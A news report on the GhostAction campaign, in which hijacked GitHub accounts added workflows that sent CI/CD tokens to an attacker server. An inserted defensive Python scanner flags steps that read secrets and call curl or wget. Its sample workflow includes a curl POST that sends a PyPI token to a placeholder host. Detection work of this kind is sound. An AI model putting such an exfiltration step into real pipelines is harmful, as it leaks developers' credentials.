A major supply chain attack dubbed ‘GhostAction’ has compromised more than 320 GitHub users and exposed thousands of secrets across the software development ecosystem, according to a report released by GitGuardian.
The attack, which took place earlier this month, saw 327 GitHub accounts compromised, with malicious GitHub Actions workflows injected into 817 repositories. The workflows were designed to exfiltrate secrets from continuous integration and deployment (CI/CD) pipelines, including PyPI, npm, and DockerHub tokens, via HTTP POST requests to a remote server controlled by the attackers.
The breach was traced back to a compromised GitHub maintainer, Grommash9, who on September 2 pushed a commit titled ‘Add Github Actions Security workflow’. This commit introduced a single GitHub Actions workflow file with malicious code designed to harvest and exfiltrate sensitive credentials.
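As an added illustration that is not part of the GitGuardian report or this article, the scanner below checks a workflow file for the combination that made this workflow dangerous: a step that reads repository secrets and also invokes an HTTP client in the same step. The heuristics, the step splitter and the sample workflow are constructed assumptions, and the collector URL is a placeholder rather than an indicator from the report.

```python
import re

# Constructed heuristics for a defender-side scan of GitHub Actions workflow files
# (not GitGuardian's detection logic): flag a step that reads repository secrets
# and also invokes a tool able to send data to an arbitrary host.
SECRET_REF = re.compile(r"\$\{\{\s*secrets\.\w+\s*\}\}|toJSON\(\s*secrets\s*\)", re.I)
NET_TOOL = re.compile(r"\b(curl|wget|Invoke-WebRequest|ncat|nc)\b", re.I)
URL_OR_POST = re.compile(r"(https?://|-X\s*POST|--data\b|-d\s|--upload-file|-F\s)", re.I)
STEP_START = re.compile(r"^\s*-\s+(name|uses|run|id|env|with|if|shell)\s*:")

def split_steps(workflow_text: str) -> list[str]:
    """Crude splitter: a new chunk starts at every '- key:' line (job header is chunk 0)."""
    chunks, current = [], []
    for line in workflow_text.splitlines():
        if STEP_START.match(line) and current:
            chunks.append("\n".join(current))
            current = []
        current.append(line)
    if current:
        chunks.append("\n".join(current))
    return chunks

def find_suspicious_steps(workflow_text: str) -> list[dict]:
    """One finding per step that reads secrets AND makes an outbound HTTP request."""
    findings = []
    for index, chunk in enumerate(split_steps(workflow_text)):
        reads_secrets = SECRET_REF.search(chunk) is not None
        posts_out = NET_TOOL.search(chunk) is not None and URL_OR_POST.search(chunk) is not None
        if reads_secrets and posts_out:
            name = re.search(r"^\s*-?\s*name\s*:\s*(.+)$", chunk, re.M)
            findings.append({"step": index, "name": name.group(1).strip() if name else "<unnamed>"})
    return findings

# Constructed sample in the shape of the workflow described above; the collector
# URL is a placeholder, not an indicator from the report.
SAMPLE_WORKFLOW = """\
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - name: Publish
        uses: pypa/gh-action-pypi-publish@release/v1
        with:
          password: ${{ secrets.PYPI_TOKEN }}
      - name: Security workflow
        env:
          PYPI_TOKEN: ${{ secrets.PYPI_TOKEN }}
        run: curl -s -X POST -d "t=$PYPI_TOKEN" https://collector.example.invalid/
"""
```

The publish step passes a secret to a trusted action without any HTTP client in the step and is left alone; only the step that both reads the token and calls curl with a URL is reported.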
GitGuardian said the attack resulted in the exfiltration of over 3000 secrets, though no malicious releases were detected on PyPI, despite the attackers gaining access to at least one package, FastUUID.
GitHub user Grommash9 reverted the malicious commit after GitGuardian notified PyPI, which promptly moved the affected repository to read-only mode. However, investigators found that similar malicious commits were pushed to at least five other public repositories and an estimated ten private repositories on the same day.
“Using our GitHub commit historical dataset, we identified hundreds of similar malicious commits across multiple repositories. Our analysis revealed that 327 users fell victim to this campaign. From this initial investigation, we found no intersection between those users and the recent S1ngularity attack campaign's victims. Those two incidents are likely unrelated,” the company noted.
Speaking of which, a post-incident evaluation of the August S1ngularity incident, conducted by Wiz researchers, showed that the Nx compromise exposed 2,180 accounts and 7,200 repositories across three distinct phases.
GitGuardian says it identified “3,325 leaked secrets across the campaign, with DockerHub credentials, GitHub tokens, and NPM tokens representing the most common types.”